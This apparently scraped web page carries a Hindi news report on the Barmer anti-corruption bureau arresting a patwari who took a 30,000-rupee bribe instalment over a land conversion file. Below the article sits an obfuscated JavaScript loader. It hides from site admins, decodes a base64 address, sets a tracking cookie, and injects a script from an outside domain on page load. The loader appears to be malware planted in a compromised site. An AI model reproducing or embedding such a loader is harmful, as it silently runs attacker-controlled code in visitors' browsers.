कृषि भूमि का संपरिवर्तन पत्रावली व मौका रिपोर्ट भेजने की एवज में 30 हजार की रिश्वत लेते पटवारी गिरफ्तार

उपखंड मुख्यालय स्थित पटवार भवन में बुधवार को बाड़मेर एसीबी टीम ने कार्रवाई करते हुए पटवारी को 30 हजार रुपए की रिश्वत लेते गिरफ्तार किया। एसीबी ने आरोपी को पटवार मंडल से हिरासत में लेकर पुलिस थाना ले गई। जहां दबिश के बाद कागजी कार्रवाई कर उसे हिरासत में लिया गया।एसीबी बाड़मेर को परिवादी ने रिपोर्ट पेश कर बताया कि धने की ढाणी पटवार मंडल कमठाई में उसका खेत बाड़मेर-जालोर हाइवे पर स्थित है। उसकी कृषि भूमि में से एक बीघा जमीन का वाणिज्य संपरिवर्तन करवाने के लिए आवेदन किया था। इसमें पटवारी ने मौका रिपोर्ट सहित अन्य आवश्यक कार्रवाई कर उपखंड अधिकारी को पत्रावली पेश कर आदेश जारी करवाने की एवज में 90 हजार रुपए रिश्वत की मांग की थी। एसीबी अधिकारी ने बताया कि परिवादी से आरोपी पटवारी ने 60 हजार रुपए पूर्व में प्राप्त कर लिए शेष 30 हजार की राशि लेते हुए तहसील कार्यालय सिणधरी के पास पटवारी के सरकारी आवास से रंगे हाथों गिरफ्तार किया ।एसीबी टीम ने बताया कि परिवादी ग्राम धने की ढाणी के पास अपनी कृषि भूमि को संपरिवर्तन करवाने के लिए पटवारी के पास गया था। जहां पटवारी ने मौका रिपोर्ट व अन्य कार्रवाई कर संबंधित पत्रावली को उपखंड अधिकारी को पेश कर आदेश जारी करवाने की एवज में 90 हजार रुपए रिश्वत की मांग की थी। इस पर परिवादी ने पूर्व में पटवारी को 60 हजार दे दिए। इसके बाद बकाया 30 हजार देने को लेकर पटवारी बार-बार परिवादी को परेशान कर रहा था। इस पर एसीबी रेंज जोधपुर के उप महानिरीक्षक पुलिस हरेन्द्र महावर के सुपरविजन में बाड़मेर इकाई के अतिरिक्त पुलिस अधीक्षक नरेंद्र कुमार, उप अधीक्षक एसीबी जोधपुर किशनसिंह चारण मय टीम ने ट्रेप की कार्रवाई की। आरोपी किशनाराम के पास सिणधरी पटवार मंडल का कार्यभार है। पूर्व में उसके पास कमठाई पटवार मंडल का अतिरिक्त कार्यभार था, लेकिन 21 जनवरी को कमठाई का कार्यभार दूसरे पटवारी को दिया गया था। कार्यभार के दौरान परिवादी ने हाइवे पर स्थित अपनी कृषि भूमि को कॉमर्शियल संपरिवर्तन करवाने के लिए आवेदन किया था। इसमें पटवारी के मौका स्थिति रिपोर्ट जारी कर एसडीएम कार्यालय में पत्रावली पेश करने की एवज में रिश्वत की मांग की गई थी। इसकी शिकायत पर बुधवार को पटवारी किशनाराम के तहसील कार्यालय से सरकारी कार्य कर वापस सरकारी भवन आते ही एसीबी ने धर दबोचा।

(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();

Leave a Reply